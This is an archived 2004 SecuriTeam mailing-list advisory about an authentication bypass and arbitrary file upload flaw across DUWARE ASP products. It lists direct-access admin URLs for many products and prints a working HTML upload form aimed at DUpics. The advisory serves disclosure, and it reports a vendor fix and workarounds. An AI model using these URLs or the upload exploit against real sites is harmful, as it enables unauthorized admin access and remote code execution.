[NEWS] DUWARE Products Admin Access And Arbitrary File Upload Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 01/22/04

Next message: SecuriTeam: "[NEWS] Cisco Voice Products Vulnerabilities on IBM Servers"

Previous message: SecuriTeam: "[NT] The Bat! Memory Corruption When Parsing Multipart PGP Signed Messages"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 22 Jan 2004 14:56:45 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

DUWARE Products Admin Access And Arbitrary File Upload Vulnerability
------------------------------------------------------------------------

SUMMARY

<http://www.duware.com/> DUWARE is a software developer that provides
web-based applications such as forums, e-commerce systems, image
galleries, etc.

A vulnerability that has been discovered is shared by all the products
currently available by DUWARE, and allows attackers to gain administrative
access and arbitrary file upload.

DETAILS

Vulnerable Systems:
* DUcalendar versions 1.0, 1.1
* DUclassified versions 4.0, 4.1
* DUdirectory version 3.0
* DUdownload version 1.0
* DUgallery versions 3.0, 3.1, 3.2, 3.3
* DUpics version 3.0
* DUportal version 3.0
* DUarticle version 1.0
* DUclassmate version 1.0
* DUpoll version 3.0
* DUnews version 1.0
* DUamazon version 3.0
* DUpaypal version 3.0
* DUfaq version 1.0
* DUforum version 3.0

Admin Access

The vulnerability discovered in all DUWARE products allows malicious users
to gain administrator priviledges. An example HTML page that uses the
DUcalendar and it's /admin/edit.asp file is presented below:

----------------------------------------------------
< % Response.Buffer = True %>
< html>
< head>
< title>DUcalendar 1.0< /title>
< link href="../assets/DUcalendar.css" rel="style***" type="text/css">
< /head>
< body background="../assets/bg_main.gif" >
< table width="760" border="0" cellspacing="2" cellpadding="0">
< tr>
< td>
< !--#include file="inc_header.asp" -->
< /td>
< /tr>

< tr>
< td>
< table width="100%" border="0" cellpadding="0" cellspacing="1"
bgcolor="#003399">
< tr>
< td bgcolor="#FFFFFF">

< !--#include file="inc_menu.asp" -->
< !--#include file="inc_edit.asp" -->

< /td>
< /tr>
< /table>< /td>
< /tr>
< tr>
< td>
< !--#include file="inc_footer.asp" -->
< /td>
< /tr>
< /table>
< /body>
< /html>
----------------------------------------------------

From the code above, the files inc_menu.asp and inc_edit.asp are included.
The file inc_menu.asp contains the security code preventing the access to
the edit.asp file. Follows is the vulnerable code:

----------------------------------------------------
[...]
< %
' *** Restrict Access To Page: Grant or deny access to this page
MM_authorizedUsers=""
MM_authFailedURL="default.asp"
MM_grantAccess=false
If Session("MM_Username") < > "" Then
If (true Or CStr(Session("MM_UserAuthorization"))="") Or _
(InStr(1,MM_authorizedUsers,Session("MM_UserAuthorization"))>=1)
Then
MM_grantAccess = true
End If
End If
If Not MM_grantAccess Then
MM_qsChar = "?"
If (InStr(1,MM_authFailedURL,"?") >= 1) Then MM_qsChar = "&"
MM_referrer = Request.ServerVariables("URL")
if (Len(Request.QueryString()) > 0) Then MM_referrer = MM_referrer & "?" &

Request.QueryString()
MM_authFailedURL = MM_authFailedURL & MM_qsChar & "accessdenied=" &
Server.URLEncode(MM_referrer)
Response.Redirect(MM_authFailedURL)
End If
%>
[...]
----------------------------------------------------

The security problem is divided into three factors:

* All the administrator's code is in one file.
* A file is includes allowing the connection to the data base: <
!--#include file="../Connections/connDUcalendarAdmin.asp" -->
* No check of the administrator's rights is made in this file (given that
it was already made in the edit.asp file).

Arbitrary File Upload

A vulnerability has been identified in DUpics allowing malicious users to
upload and execute arbitrary code by bypassing javascript filters.

Example exploits

Admin Access:

* http://[target]/admin/inc_edit.asp?iEve=1
* http://[target]/admin/inc_events.asp
* http://[target]/admin/inc_type.asp

>> DUclassified :
* http://[target]/admin/inc_cats.asp
* http://[target]/admin/inc_users.asp
* http://[target]/admin/inc_user_edit.asp?id=admin

>> DUdirectory :
* http://[target]/admin/inc_links.asp
* http://[target]/admin/inc_edit.asp?iLink=10
* http://[target]/admin/inc_type.asp

>> DUdownload :
* http://[target]/admin/inc_files.asp
* http://[target]/admin/inc_edit.asp?iFile=50
* http://[target]/admin/inc_type.asp

>> DUgallery :
* http://[target]/admin/inc_pictures.asp
* http://[target]/admin/inc_edit.asp?iPic=100
* http://[target]/admin/inc_type.asp

>> DUpics :
* http://[target]/admin/inc_add.asp
* http://[target]/admin/inc_pics.asp
* http://[target]/admin/inc_edit.asp?iPic=500
* http://[target]/admin/inc_type.asp

>> DUportal :
* http://[target]/admin/inc_channel_listing.asp
* http://[target]/admin/inc_channel_edit.asp?iChannel=5
* http://[target]/admin/inc_config.asp
* http://[target]/admin/inc_users.asp
* http://[target]/admin/inc_users_edit.asp?iUser=admin

etc...

Arbitrary File Upload :

>> DUpics :
------------------Dupicsexploit.html------------------
< html>
< head>< title>DUpics 3.0 Arbitrary File Upload Exploit< /title>< /head>
< body>
< form action="/admin/inc_add.asp?GP_upload=true" method="post"
enctype="multipart/form-data"
onsubmit="this.action=this.url.value+this.action;alert('Your file will be
uploaded to '+this.url.value+'/pictures/');">
Target URL : < input type="text" name="url"
value="http://[target]/DUpics/">< br>
FILE : < input name="PIC_IMAGE" type="file">< br>
< input type="hidden" name="PIC_NAME" value="admin">
< input type="hidden" name="PIC_WIDTH">
< input type="hidden" name="PIC_HEIGHT">
< input type="hidden" name="PIC_APPROVED" value="1">
< input type="hidden" name="MM_insert" value="true">
< input type="submit" value="Upload" name="submit">
< /form>
< p align="right">For more informations about this exploit :
< a href="http://www.security-corporation.com/advisories-026.html"
target="_blank"> Security-Corporation.com< /a>< /p>
< /body>
< /html>
------------------Dupicsexploit.html------------------

Vendor Status:
The DUWare Services has been notified and have released a fix for all
products.

Workarounds:
It is necessary to change one of the three points quoted previously. Do
not put all the administration code in these files, or remove the
inclusion in all inc_ files and add it in the main file. < !--#include
file="../Connections/connDUcalendarAdmin.asp" -->. Alternatively, check
the admin session in all inc_ files.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:frog-man@security-corporation.com> frog-m@n
The original article can be found at:
<http://www.security-corporation.com/advisories-026.html>
http://www.security-corporation.com/advisories-026.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NEWS] Cisco Voice Products Vulnerabilities on IBM Servers"

Previous message: SecuriTeam: "[NT] The Bat! Memory Corruption When Parsing Multipart PGP Signed Messages"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

SecurityFocus Microsoft Newsletter #165
... Tenable Security ... distribute, manage, and communicate vulnerability
and intrusion detection ... Microsoft Internet Explorer MHTML Forced File Execution Vuln...
... (Focus-Microsoft)
SecurityFocus Microsoft Newsletter #174
... This issue sponsored by: Tenable Network Security ... the worlds only 100% passive
vulnerability ... MICROSOFT VULNERABILITY SUMMARY ... Novell Netware Enterprise
Web Server Multiple Vulnerabilitie... ... (Focus-Microsoft)
[NT] Cumulative Security Update for Internet Explorer (MS04-038)
... The following security advisory is sent to the securiteam mailing list, and can be found at
the SecuriTeam web site: http://www.securiteam.com ... Get your security news from
a reliable source. ... CSS Heap Memory Corruption Vulnerability, ... Microsoft
Windows NT Server 4.0 Terminal Server Edition Service Pack 6 ... (Securiteam)
SecurityFocus Microsoft Newsletter #171
... Better Management for Network Security ... GoodTech Telnet Server Remote
Denial Of Service Vulnerabilit... ... ASPApp PortalAPP Remote User Database Access Vulnerability
... (Focus-Microsoft)
SecurityFocus Microsoft Newsletter #160
... MICROSOFT VULNERABILITY SUMMARY ... Geeklog Forgot Password SQL Injection
Vulnerability ... Atrium Software Mercur Mailserver IMAP AUTH Remote Buffer Ov... ...
Sun Java Virtual Machine Slash Path Security Model Circumven... ... (Focus-Microsoft)